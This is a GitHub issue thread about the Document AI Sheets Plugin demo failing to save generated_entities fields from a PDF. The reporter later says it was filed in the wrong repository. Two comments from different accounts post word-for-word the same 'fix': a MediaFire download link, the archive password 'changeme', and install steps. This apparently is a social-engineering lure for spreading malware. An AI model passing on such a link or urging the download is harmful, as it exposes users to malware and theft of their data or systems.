### ISSUE TITLE
Document AI Sheets Plugin Demo

### ISSUE THREAD

**Issue by yashjit** [GoogleCloudPlatform/document-ai-samples#887]
Document AI Sheets Plugin Demo does not process as desired while retrieved field key button pressed . Gives error on attached pdf file. column filed added on key is generated_entities which is an object of keys. So all the keys it does not saved in the excel sheet and neither fetch the data
[0000157 - 2005-11-10 - Offer.pdf](https://github.com/user-attachments/files/16757959/0000157.-.2005-11-10.-.Offer.pdf)
![Screenshot (6)](https://github.com/user-attachments/assets/70d5d18e-629c-424b-873c-51ef3ba4b1fc)
![Screenshot (5)](https://github.com/user-attachments/assets/b22e0133-d229-4225-b935-33305ba511f2)
![Screenshot (4)](https://github.com/user-attachments/assets/192e3e54-dfa4-49f4-8081-32162ce9b87b)
![Screenshot (3)](https://github.com/user-attachments/assets/aaba0df4-25ca-4a38-a2fb-a83a124844ca)

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by yashjit** [comment]
Mistakenly placed in wrong repo
